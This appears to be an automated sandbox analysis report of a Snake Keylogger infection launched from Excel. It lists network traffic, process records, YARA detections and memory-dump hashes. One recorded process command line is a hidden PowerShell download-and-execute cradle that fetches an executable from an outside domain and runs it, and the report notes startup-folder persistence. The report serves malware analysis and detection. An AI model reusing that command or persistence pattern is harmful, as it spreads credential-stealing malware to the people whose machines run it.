Nov 25, 2024 14:58:06.865701914 CET | 8.8.8.8 | 192.168.2.22 | 0x410a | No error (0) | cia.tf | | 104.21.1.182 | A (IP address) | IN (0x0001) | false
                                                                                              • cia.tf
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 172.67.129.178 | 443 | 3604 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 13:58:08 UTC | 186 | OUT | GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005
                                                                                              Host: cia.tf
                                                                                              Connection: Keep-Alive
2024-11-25 13:58:09 UTC | 972 | IN | HTTP/1.1 200 OK
                                                                                              Date: Mon, 25 Nov 2024 13:58:08 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 1072096
                                                                                              Connection: close
                                                                                              Cache-Control: public, max-age=14400
                                                                                              content-disposition: attachment; filename="Offer to purchase.exe"
                                                                                              etag: W/"105be0-1934e18f460"
                                                                                              last-modified: Thu, 21 Nov 2024 09:41:18 GMT
                                                                                              x-powered-by: Express
                                                                                              CF-Cache-Status: MISS
                                                                                              Accept-Ranges: bytes
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gsQQcYbRBXcBgL%2BGMPFaVd7dxXdezdtRN%2FEsQ7RMhxtdTjB0EgA74733iSVPk7DAbJBoyai24TqJTYTte%2FA48I0CyGrcMzjqUVhjGi%2BOYJpfnoCU0nKZMXM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8e8226debc65c427-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1590&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2808&recv_bytes=800&delivery_rate=1830721&cwnd=243&unsent_bytes=0&cid=8319d40ba48bf31d&ts=967&x=0"


Target ID: 0
Start time: 08:58:01
Start date: 25/11/2024
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase: 0x13f5d0000
File size: 28'253'536 bytes
MD5 hash: D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 08:58:03
Start date: 25/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
Imagebase: 0x13f100000
File size: 443'392 bytes
MD5 hash: A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 08:58:11
Start date: 25/11/2024
Path: C:\Users\user\AppData\Local\Temp\tmp667.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\tmp667.exe"
Imagebase: 0x1180000
File size: 1'072'096 bytes
MD5 hash: 2ED7362E959D42385D4E6D231A6840DD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.451714574.00000000048B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 68%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 7
Start time: 08:58:33
Start date: 25/11/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
Imagebase: 0xff930000
File size: 168'960 bytes
MD5 hash: 045451FA238A75305CC26AC982472367
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 08:58:35
Start date: 25/11/2024
Path: C:\Users\user\AppData\Roaming\svcost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\svcost.exe"
Imagebase: 0xe00000
File size: 262'244'634 bytes
MD5 hash: E3902A9C7AC3C2180B535F81DA7CD147
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.385198960.000007FE8B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B910000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_7fe8b910000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 21e84d70754dfea9a9356b5df68d3a6ed1a30d16295465fa7db9b9679a4aa17e
                                                                                                • Instruction ID: 03251d4dc9fa3400e07990ecdc4c048a787bfe0b3d6beb480083735f138be7c6
                                                                                                • Opcode Fuzzy Hash: 21e84d70754dfea9a9356b5df68d3a6ed1a30d16295465fa7db9b9679a4aa17e
                                                                                                • Instruction Fuzzy Hash: 6881DF2060DACA4FEB56A73C94147B5BFE1EF8A258F1800EBD08DC71B3DA199C56C351

                                                                                                Execution Graph

                                                                                                Execution Coverage:10.3%
                                                                                                Dynamic/Decrypted Code Coverage:95.2%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:62
                                                                                                Total number of Limit Nodes:4

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: f"p$8$l$$l$$l$$l$$l$$x$$x$$x$$$$$$$$$$oV
                                                                                                • API String ID: 0-1405324388
                                                                                                • Opcode ID: 8eed91ea7c7176567b673d7b1b705cce18daeff38c1c5cbe0abf467529ddf862
                                                                                                • Instruction ID: dc2c6e6e192430bbe9bc0c358f548a1d5b2b6717cff2655908d677568127ec12
                                                                                                • Opcode Fuzzy Hash: 8eed91ea7c7176567b673d7b1b705cce18daeff38c1c5cbe0abf467529ddf862
                                                                                                • Instruction Fuzzy Hash: F052D475E00629CFDB64DF69C890AD9B7B6FF89300F1085AAD909A7355DB30AE81CF50

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: f"p$h$x$$x$$x$$oV
                                                                                                • API String ID: 0-1822689336
                                                                                                • Opcode ID: e25e3d563dc70a3d4a25157fc17289da7a20f58ce5d0746958116f0be3bc9783
                                                                                                • Instruction ID: 19b3539cede45b79c0b7aa4fcf156c6f823ab0f3d66bbbb7fcd6619ec6f1df0b
                                                                                                • Opcode Fuzzy Hash: e25e3d563dc70a3d4a25157fc17289da7a20f58ce5d0746958116f0be3bc9783
                                                                                                • Instruction Fuzzy Hash: C4810475E00628DFEB64DF69D850AD9B7B2FF89300F1082AAD419A7355DB306E81CF50

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0l$$2$H<$$Lk$$oV
                                                                                                • API String ID: 0-3967312034
                                                                                                • Opcode ID: 18e580380a3964de137f4de4ed1ab8cb18d9426244c5efd696987a4243cc51c3
                                                                                                • Instruction ID: 80e4eb23cfb6aeb7cba85e7ed430aa3bfb6f7dc0f77b270e44fbb9491db1b327
                                                                                                • Opcode Fuzzy Hash: 18e580380a3964de137f4de4ed1ab8cb18d9426244c5efd696987a4243cc51c3
                                                                                                • Instruction Fuzzy Hash: 2CE2D774E046288FDB65EF68D98479DB7B6FB89301F1081EAE409A7395DB709E81CF40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p$4$8kM$fM
                                                                                                • API String ID: 0-3818114213
                                                                                                • Opcode ID: f275a7e442a8790ab7a9866efeb336c9f94733359e8205de2dde7cf00d1846b7
                                                                                                • Instruction ID: 324daa5c7418a632e5651ae0b565efd54c2647c04be3affae0ddb9b8127da923
                                                                                                • Opcode Fuzzy Hash: f275a7e442a8790ab7a9866efeb336c9f94733359e8205de2dde7cf00d1846b7
                                                                                                • Instruction Fuzzy Hash: 12B2F734A10218DFDB14DFA4C894BADB7B6FF88701F1491A6E905AB3A5DB70AC45CF60

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$$TJ"p$p!p$xb p
                                                                                                • API String ID: 0-2213208798
                                                                                                • Opcode ID: a461a2d92671d3b6391c3b0abc17cd5124b458caf31463be8b712547f2e64fab
                                                                                                • Instruction ID: b0686a9ee6603ebe2c2554fea711c1b28de61c3267ee0d489417cd58612ff7c3
                                                                                                • Opcode Fuzzy Hash: a461a2d92671d3b6391c3b0abc17cd5124b458caf31463be8b712547f2e64fab
                                                                                                • Instruction Fuzzy Hash: AAA2A575A00228CFDB64DF69C984B9DBBB2BF89304F1581E9D509AB325D731AE81CF40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,!p$4$8kM$fM
                                                                                                • API String ID: 0-3818114213
                                                                                                • Opcode ID: 7f62ac3772b465bc2e046468a0dc09554ae181667bef9ed40ca9efa0c93cad9a
                                                                                                • Instruction ID: 3192c3b867851ee59d219dafb4047cf6f5c032381feb6f2376ed557d3511301f
                                                                                                • Opcode Fuzzy Hash: 7f62ac3772b465bc2e046468a0dc09554ae181667bef9ed40ca9efa0c93cad9a
                                                                                                • Instruction Fuzzy Hash: CC220D34A10218DFDF24DF54C894BADB7B2BF48701F1491A6E909AB3A5DB70AD85CF60

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `{$$`{$$oV
                                                                                                • API String ID: 0-1816416316
                                                                                                • Opcode ID: 81c0f759b1ef6c6487e90ae56a70327928bbf8958eb3b67df7e40b26c96022cd
                                                                                                • Instruction ID: 6f8300c481e5251b75f2ece606a46f2338bc5867fe8210f46631e7c34670406e
                                                                                                • Opcode Fuzzy Hash: 81c0f759b1ef6c6487e90ae56a70327928bbf8958eb3b67df7e40b26c96022cd
                                                                                                • Instruction Fuzzy Hash: AA52C6B4A046288FCB64DF28DD84B9AB7B6FB89301F1085E5D90DA7355DB30AE81CF51

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446542643.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6f0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$DYM
                                                                                                • API String ID: 0-437157658
                                                                                                • Opcode ID: d4f3bdd6ea1f88531268ca915ede52026862e8de46b07f86f2edcf775bac2583
                                                                                                • Instruction ID: ed5dcbd2e81dfdb119eb08536f6801a649b4226f2fa03ab33a49d705406e2646
                                                                                                • Opcode Fuzzy Hash: d4f3bdd6ea1f88531268ca915ede52026862e8de46b07f86f2edcf775bac2583
                                                                                                • Instruction Fuzzy Hash: 31627A74A047198FCB15CF68C89466EFBF2FF88300F24856AEA66D7751DB34A901CB94
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446542643.00000000006F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6f0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: dee455207b7ce913a0dfce23cf9018537c358d4fca6bfa0333654e17e5f346ae
                                                                                                • Instruction ID: 3e82d8e9d96269ba2a3bf09f60533b3159c0c48169981dffa3cf22a0044d9862
                                                                                                • Opcode Fuzzy Hash: dee455207b7ce913a0dfce23cf9018537c358d4fca6bfa0333654e17e5f346ae
                                                                                                • Instruction Fuzzy Hash: 11D10274E0521CCFEB24DF69D944BADBBB7BB89310F2090AAD509A7349DB705986DF00
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 32b6000b21bc1aebdb3e97be80f8e6ff5362b4f8ed206651c0cab0b1027525a5
                                                                                                • Instruction ID: 6b0e7c0c542861e33670c5580e4670530e4757e5ee5bcae18e68c1ce1262479e
                                                                                                • Opcode Fuzzy Hash: 32b6000b21bc1aebdb3e97be80f8e6ff5362b4f8ed206651c0cab0b1027525a5
                                                                                                • Instruction Fuzzy Hash: BFB13470E04218CFDB24DFA9D854B9DB7F6BB89301F2080AAD809A7395DB719D89DF10
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 1e5895b9ddb3b3b9bdac813e49ecaf4ba1461d8e1dfbe3ae11714789b5585d55
                                                                                                • Instruction ID: 07a70d13a3b639885f0804c0f307aad956bf43f9a28b3eb930beb94232eb8961
                                                                                                • Opcode Fuzzy Hash: 1e5895b9ddb3b3b9bdac813e49ecaf4ba1461d8e1dfbe3ae11714789b5585d55
                                                                                                • Instruction Fuzzy Hash: BCB13674E05218CFDB24DFA9D844B9DB7F2BB89301F2480AAD809A7395DB719D89DF10
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: oV
                                                                                                • API String ID: 0-2220627765
                                                                                                • Opcode ID: 59dd6f3cad520242f953aa2e8f372ed7e5332faad98e4d79394b04d424d7e8b3
                                                                                                • Instruction ID: 5dbcfed8ff086cbfda005900e03ca23d993c1534719e786585f3859d4149914e
                                                                                                • Opcode Fuzzy Hash: 59dd6f3cad520242f953aa2e8f372ed7e5332faad98e4d79394b04d424d7e8b3
                                                                                                • Instruction Fuzzy Hash: 7C510B70E01A588BEB18DF6BDC4479ABBF3AFC9301F14C1AAD408AB259DB705985CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f9e62e6d7a0d394149d7ee0d2ffb990913ff203b94ff709d54485841d31d43a4
                                                                                                • Instruction ID: c41ad5b913753eb9631bc1dcebeeb9b6ecabf6db2a870a29628ca9e3cacfd02e
                                                                                                • Opcode Fuzzy Hash: f9e62e6d7a0d394149d7ee0d2ffb990913ff203b94ff709d54485841d31d43a4
                                                                                                • Instruction Fuzzy Hash: 88B1C574E05218CFDB14EF6AD884BADBBF6BF89314F2090AAD419A7355D7309986CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b1ec83d75f7a8c2897787c714412d0f9d1aaf05afd09a0a290b1ac8fbdb62f1a
                                                                                                • Instruction ID: 40b5b510884538b98b2a3ecadcc2339ef9b29ba879c3f0efe68960b06b8d29c0
                                                                                                • Opcode Fuzzy Hash: b1ec83d75f7a8c2897787c714412d0f9d1aaf05afd09a0a290b1ac8fbdb62f1a
                                                                                                • Instruction Fuzzy Hash: 79914870E0521ECFEB24CF69D854BADBBB2BF49324F2490AAD009A7355D7709985DF00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 956f2aab6d5d64705583ac2c89aac566957a443214e4a74eddf4ca9f0cf48a70
                                                                                                • Instruction ID: b8d5db079d307149fd760f60c59c864bfc51a01cdb21ed6f202661c6cbd91ad4
                                                                                                • Opcode Fuzzy Hash: 956f2aab6d5d64705583ac2c89aac566957a443214e4a74eddf4ca9f0cf48a70
                                                                                                • Instruction Fuzzy Hash: EF811675A00618CFDB14DFA9C484E9DBBF5BF98311B1685AAE816DB360DB30ED41CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 24e3ba3372732d0751ada3bf523ba633e64a0140ca0d79091c37937c38f0beb1
                                                                                                • Instruction ID: 60d7227fff1c7f311cb74bf8bfb0eb15da2ebdd58f6edbca454a7e2a95a3723c
                                                                                                • Opcode Fuzzy Hash: 24e3ba3372732d0751ada3bf523ba633e64a0140ca0d79091c37937c38f0beb1
                                                                                                • Instruction Fuzzy Hash: 5A7128B5E047058FD708EFAAE94169EBBF6BF88300F14C56AE4149B368DF345946CB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 98a997cdb3d954dd83348d1fc3bb31717474a82fd67f911ac896a2aa09e360a5
                                                                                                • Instruction ID: 8c1a382a62b39eb0ac98f0a3d2081a2afcba36c6db1e8a0f057e8abdbce84ef9
                                                                                                • Opcode Fuzzy Hash: 98a997cdb3d954dd83348d1fc3bb31717474a82fd67f911ac896a2aa09e360a5
                                                                                                • Instruction Fuzzy Hash: CE711AB5E017098FD708EFAAE94169EBBF6BB88300F14C56AE4149B368DF345946CB50

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.445795160.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_1c0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!p$(!p$(!p$(!p$(!p
                                                                                                • API String ID: 0-3955841951
                                                                                                • Opcode ID: eb2a4863b31000acf97c60c62a2c34fed5100c36f7c002ed0cbd6f3d8411f1a5
                                                                                                • Instruction ID: e7221d923f7cbd7b33cf446214801052ec05cae138fd5409095f162fce050e00
                                                                                                • Opcode Fuzzy Hash: eb2a4863b31000acf97c60c62a2c34fed5100c36f7c002ed0cbd6f3d8411f1a5
                                                                                                • Instruction Fuzzy Hash: 8BC102363143558FDB14DF68D855AAE7BE2EF84314B29417EE909CB3A6CB34DC0287A1

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446508934.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6d0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ^$^$oV
                                                                                                • API String ID: 0-2349651716
                                                                                                • Opcode ID: aa7154dcdebc8daa105922ccc8a9c46c99684d61569a6452b142a24f922b2376
                                                                                                • Instruction ID: d4d256f5b4deaf7e6507d82ef8da53f823da7c4d1ca6d5149fa7fa4bc45ec71f
                                                                                                • Opcode Fuzzy Hash: aa7154dcdebc8daa105922ccc8a9c46c99684d61569a6452b142a24f922b2376
                                                                                                • Instruction Fuzzy Hash: 1E41B374D01268CFDB51EFA4C898BDDBBB2BB49301F20519AE4096B394CB745E85CF54

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.452343355.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_5400000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: <`$$T$oV
                                                                                                • API String ID: 0-870889960
                                                                                                • Opcode ID: aefc6be65273b51267e01cede2b8baa3d325bc46429c18910d339a43d15362af
                                                                                                • Instruction ID: dfe34b28cfdf9d43d83878e78b63b7d694cd545e708136807c64f028c0cbb21b
                                                                                                • Opcode Fuzzy Hash: aefc6be65273b51267e01cede2b8baa3d325bc46429c18910d339a43d15362af
                                                                                                • Instruction Fuzzy Hash: 8341F374A08228CFCB64DF58D958AEAB7B1FF49300F1050E6E549A7395D7746E90CF01

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446459058.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_6b0000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: +$/$oV
                                                                                                • API String ID: 0-2082966017
                                                                                                • Opcode ID: 29c2b446885f0e37dabd0d5e442dd4a5b86b871253ed4e2148ea263767ba740d
                                                                                                • Instruction ID: df87dd2ba5575837d2fa9ebe50368ccb3dc21b25b37d2c8fa29f547cd628262a
                                                                                                • Opcode Fuzzy Hash: 29c2b446885f0e37dabd0d5e442dd4a5b86b871253ed4e2148ea263767ba740d
                                                                                                • Instruction Fuzzy Hash: 8721327490029ADBCB20EF58D844BDCB7B2FB49319F1091AAEA1DB7214C770AAC5CF44

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.446656192.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_d50000_tmp667.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$$"$(
                                                                                                • API String ID: 0-2989394736
                                                                                                • Opcode ID: 3ce081e4b29b46e589a42fc15790c180f71fdecbc9e4ffd62c7810ff21943339
                                                                                                • Instruction ID: 2267b5bcfc838086fd926667ce45be2d066f515f8dfdc66ddf671c6841d6f7f6
                                                                                                • Opcode Fuzzy Hash: 3ce081e4b29b46e589a42fc15790c180f71fdecbc9e4ffd62c7810ff21943339
